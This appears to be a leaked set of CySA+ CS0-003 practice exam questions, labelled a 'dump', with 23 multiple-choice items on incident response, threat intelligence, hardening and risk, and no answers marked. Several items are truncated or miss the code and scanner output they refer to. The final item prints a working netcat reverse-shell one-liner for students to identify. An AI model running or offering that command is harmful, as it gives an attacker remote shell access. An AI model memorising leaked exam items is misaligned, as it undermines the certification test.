Title of test:
CySA+ CS0-003 Jan24

Description:
CySa+ Dump Jan24

Author:
jack01

Creation Date:
08/02/2024

Category: Computers

Number of questions: 23
Content:
Which of the following best describes the key elements of a successful information security program?
Business impact analysis, asset and change management, and security communication plan
Security policy implementation, assignment of roles and responsibilities, and information asset classification
Disaster recovery and business continuity planning, and the definition of access control requirements and human resource policies
Senior management organizational structure, message distribution standards, and procedures for the operation of security management systems.

Which of the following security operations tasks are ideal for automation?
Suspicious file analysis: Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder.
Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit. Take mitigating actions in the firewall to block the behavior found in the logs. Follow up on any false positives that were caused by the block rules.
Security application user errors: Search the error logs for signs of users having trouble with the security application. Look up the user's phone number. Call the user to help with any questions about using the application.
Email header analysis: Check the email header for a phishing confidence metric greater than or equal to five. Add the domain of the sender to the block list. Move the email to quarantine.

A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls, and two-factor authentication. Which of the following does this most likely describe?
System hardening
Hybrid network architecture
Continuous authorization
Secure access service edge.

A company brings in a consultant to make improvements to its website. After the consultant leaves, a web developer notices unusual activity on the website and submits a suspicious file containing the following code to the security team:
Implanted a backdoor
Implemented privilege escalation
Implemented clickjacking
Patched the web server.

Which of the following makes STIX and OpenIoC information readable by both humans and machines?
XML
URL
OVAL
TAXII.

An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security services and performs cleanup routines on its infected hosts, including deletion of the initial dropper and removal of event log entries and prefetch files from the host. Which of the following data sources would most likely reveal evidence of the root cause? (Select two)
Creation time of dropper
Registry artifacts
EDR data
Prefetch files
File system metadata
Sysmon event log.

During an incident, some IoCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?
Isolation
Remediation
Reimaging
Preservation.

When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgrounds containing host details, has been running for over two days. Which of the following activities will provide the best insight into this potentially malicious process, based on the anomalous behavior?
Changes to system environment variables
SMB network traffic related to the system process
Recent browser history of the primary user
Activities taken by PID 1024.

A Chief Information Security Officer (CISO) wants to disable a functionality on a business-critical web application that is vulnerable to RCE in order to maintain the minimum risk level with minimal increased cost. Which of the following risk treatments best describes what the CISO is looking for?
Transfer
Mitigate
Accept
Avoid.

An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration?
CIS Benchmarks
PCI DSS
OWASP Top Ten
ISO 27001.

Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?
To ensure the report is legally acceptable in case it needs to be presented in court
To present a lessons-learned analysis for the incident response team
To ensure the evidence can be used in a postmortem analysis
To prevent the possible loss of a data source for further root cause analysis.

While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the following controls is most likely preventing the analyst from finding the proper memory address of the piece of malicious code?
Address space layout randomization
Data execution prevention
Stack canary
Code obfuscation.

An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed?
Blocklisting
Allowlisting
Graylisting
Webhooks.

A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?
Deploy a WAF to the front of the application.
Replace the current MD5 with SHA-256.
Deploy an antivirus application on the hosting system.
Replace the MD5 with digital signatures.

A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around?
OSSTMM
Diamond Model of Intrusion Analysis
OWASP
MITRE ATT&CK.

Which of the following best describes the importance of implementing TAXII as part of a threat intelligence program?
It provides a structured way to gain information about insider threats.
It proactively facilitates real-time information sharing between the public and private sectors.
It exchanges messages in the most cost-effective way and requires little maintenance once implemented.
It is a semi-automated solution to gather threat intelligence about competitors in the same sector.

attacks. Which of the following combinations of configuration changes should the organization make to remediate this issue? (Select two)
Configure the server to prefer TLS 1.3.
Remove cipher suites that use CBC.
Configure the server to prefer ephemeral modes for key exchange.
Require client browsers to present a user certificate for mutual authentication.
Configure the server to require HSTS.
Remove cipher suites that use GCM.

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?
Hacktivist threat
Advanced persistent threat
Unintentional insider threat
Nation-state threat.

A company has the following security requirements:
No public IPs
All data secured at rest
No insecure ports/protocols
After a cloud scan is completed, a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output:
Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?
VM_PRD_DB
VM_DEV_DB
VM_DEV_Web02
VM_PRD_Web01.

Which of the following should be updated after a lessons-learned review?
Disaster recovery plan
Business continuity plan
Tabletop exercise
Incident response plan.

A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cyber Kill Chain does this act exhibit?
Reconnaissance
Weaponization
Exploitation
Installation.

Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the following authentication methods should the analyst use?
MFA
User and password
PAM
Key pair.

A security analyst detected the following suspicious activity:
rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > tmp/f
Which of the following most likely describes the activity?
Network pivoting
Host scanning
Privilege escalation
Reverse shell.